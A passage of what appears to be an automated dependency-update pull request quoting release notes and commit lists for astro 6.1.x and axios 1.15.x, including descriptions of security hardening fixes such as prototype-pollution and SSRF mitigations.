prefix\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16480\"\u003e#16480\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1bcb43bf04f3fa8f4623897ae2a937250f35216a\"\u003e\u003ccode\u003e1bcb43b\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes an unnecessary full page reload on first navigation during dev\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e6.1.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16448\"\u003e#16448\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Updates vite, picomatch, and unstorage to latest patch versions\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16422\"\u003e#16422\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a3951d7873c7c210fedbaa77702bc33db6410715\"\u003e\u003ccode\u003ea3951d7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens \u003ccode\u003eastro-island\u003c/code\u003e export resolution and hydration error handling for malformed component metadata\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16420\"\u003e#16420\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/e21de1d03b318d5045dba718291c04fe05c01490\"\u003e\u003ccode\u003ee21de1d\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens Astro's error overlay and server logging paths to avoid unsafe HTML insertion and format-string interpolation\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16419\"\u003e#16419\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens nested object and package metadata lookups to ignore prototype keys in content handling and project scaffolding\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16022\"\u003e#16022\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a002540d60d4a840db9971e73c820a8015658ffe\"\u003e\u003ccode\u003ea002540\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mathieumaf\"\u003e\u003ccode\u003e@​mathieumaf\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where i18n domains would return 404 when \u003ccode\u003etrailingSlash\u003c/code\u003e is set to \u003ccode\u003enever\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/internal-helpers\u003c/code\u003e\u003ca href=\"https://github.com/0\"\u003e\u003ccode\u003e@​0\u003c/code\u003e\u003c/a\u003e.9.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/markdown-remark\u003c/code\u003e\u003ca href=\"https://github.com/7\"\u003e\u003ccode\u003e@​7\u003c/code\u003e\u003c/a\u003e.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e6.1.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16367\"\u003e#16367\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a6866a7ef086627f8f8237274361d8acc2f85121\"\u003e\u003ccode\u003ea6866a7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where build output files could contain special characters (\u003ccode\u003e!\u003c/code\u003e, \u003ccode\u003e~\u003c/code\u003e, \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e}\u003c/code\u003e) in their names, causing deploy failures on platforms like Netlify.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16381\"\u003e#16381\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/217c5b3b937f0aee7e59280e8a10cf2bd4237605\"\u003e\u003ccode\u003e217c5b3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Slightly improved the performance of the dev server by caching the internal crawling of the dependencies of a project.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16348\"\u003e#16348\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/7d26cd77bc1b33cee81f0e7b408dc2d170be1bdd\"\u003e\u003ccode\u003e7d26cd7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ocavue\"\u003e\u003ccode\u003e@​ocavue\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where emitted assets during a client build would contain always fresh, new hashes in their name. Now the build should be more stable.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where \u003ccode\u003eallowedDomains\u003c/code\u003e weren't correctly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16379\"\u003e#16379\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5a845514114ae21ca9820e98b56cce33c0cf579b\"\u003e\u003ccode\u003e5a84551\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/martrapp\"\u003e\u003ccode\u003e@​martrapp\u003c/code\u003e\u003c/a\u003e! - Improves Vue scoped style handling in DEV mode during client router navigation.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Adds tests to verify settings are properly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16282\"\u003e#16282\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5b0fdaa8ba3dc17f4b93d9847c3255150b0aeab2\"\u003e\u003ccode\u003e5b0fdaa\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jmurty\"\u003e\u003ccode\u003e@​jmurty\u003c/code\u003e\u003c/a\u003e! - Fixes build errors on platforms with skew protection enabled (e.g. Vercel, Netlify) for inter-chunk Javascript using dynamic imports\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/e0b240edea4db632138def3a9003b4b12e12f765\"\u003e\u003ccode\u003ee0b240e\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/telemetry\u003c/code\u003e\u003ca href=\"https://github.com/3\"\u003e\u003ccode\u003e@​3\u003c/code\u003e\u003c/a\u003e.3.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/c1f2e4f62adc1f2ba7b36f400f38fbab8862bc74\"\u003e\u003ccode\u003ec1f2e4f\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16467\"\u003e#16467\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/345fb9e370ddcd633c1043326e723ee43c89a3e4\"\u003e\u003ccode\u003e345fb9e\u003c/code\u003e\u003c/a\u003e chore: fix flaky dev toolbar render time test (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16500\"\u003e#16500\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/5120ecd4c337a7c59c4956ff8fd6bf327b4abce9\"\u003e\u003ccode\u003e5120ecd\u003c/code\u003e\u003c/a\u003e [ci] format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd\"\u003e\u003ccode\u003e3d82220\u003c/code\u003e\u003c/a\u003e Add AEAD context binding to server island encryption (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16457\"\u003e#16457\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/1bcb43bf04f3fa8f4623897ae2a937250f35216a\"\u003e\u003ccode\u003e1bcb43b\u003c/code\u003e\u003c/a\u003e Prebundle dev toolbar entrypoint in client environment (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16480\"\u003e#16480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/93101cce781585574d6b528bae05d5b6a02e63bd\"\u003e\u003ccode\u003e93101cc\u003c/code\u003e\u003c/a\u003e [ci] format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/152700e08178285b240d8ef947cccd47b870ee5f\"\u003e\u003ccode\u003e152700e\u003c/code\u003e\u003c/a\u003e fix: strip sourceMappingURL from dev toolbar entrypoint during dep optimizati...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/bc8304121b79f5fdcfb400d6baea977840391134\"\u003e\u003ccode\u003ebc83041\u003c/code\u003e\u003c/a\u003e refactor(astro): migrate test utils to typescript (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16492\"\u003e#16492\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/5c543c595def9826acdd71c1cb88f08f8d63f1a5\"\u003e\u003ccode\u003e5c543c5\u003c/code\u003e\u003c/a\u003e refactor(astro): add internal entry points for test (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16473\"\u003e#16473\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/1058428df2d13878c6130787636dd1778273a934\"\u003e\u003ccode\u003e1058428\u003c/code\u003e\u003c/a\u003e Suppress content config warning for projects without content collections (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16\"\u003e#16\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/withastro/astro/commits/astro@6.1.10/packages/astro\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 1.13.5 to 1.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.15.1\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eLocation\u003c/code\u003e Request Header Type:\u003c/strong\u003e Adds \u003ccode\u003eLocation\u003c/code\u003e to \u003ccode\u003eCommonRequestHeadersList\u003c/code\u003e for accurate typing of redirect-aware requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7528\"\u003e#7528\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFormData Handling:\u003c/strong\u003e Removes \u003ccode\u003eContent-Type\u003c/code\u003e when no boundary is present on \u003ccode\u003eFormData\u003c/code\u003e fetch requests, supports multi-select fields, cancels \u003ccode\u003erequest.body\u003c/code\u003e instead of the source stream on fetch abort, and fixes a recursion bug in form-data serialisation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7314\"\u003e#7314\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10676\"\u003e#10676\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10702\"\u003e#10702\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10726\"\u003e#10726\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter:\u003c/strong\u003e Handles socket-only request errors without leaking keep-alive listeners. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10576\"\u003e#10576\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProgress Events:\u003c/strong\u003e Clamps \u003ccode\u003eloaded\u003c/code\u003e to \u003ccode\u003etotal\u003c/code\u003e for computable upload/download progress events. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7458\"\u003e#7458\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes:\u003c/strong\u003e Aligns \u003ccode\u003erunWhen\u003c/code\u003e type with the runtime behaviour in \u003ccode\u003eInterceptorManager\u003c/code\u003e and makes response header keys case-insensitive. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7529\"\u003e#7529\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10677\"\u003e#10677\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ebuildFullPath\u003c/code\u003e:\u003c/strong\u003e Uses strict equality in the base/relative URL check. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7252\"\u003e#7252\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eAxiosURLSearchParams\u003c/code\u003e Regex:\u003c/strong\u003e Improves the regex used for param serialisation to avoid edge-case mismatches. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10736\"\u003e#10736\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eResilient Value Parsing:\u003c/strong\u003e Parses out header/config values instead of throwing on malformed input. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10687\"\u003e#10687\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2 - April 21, 2026\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca 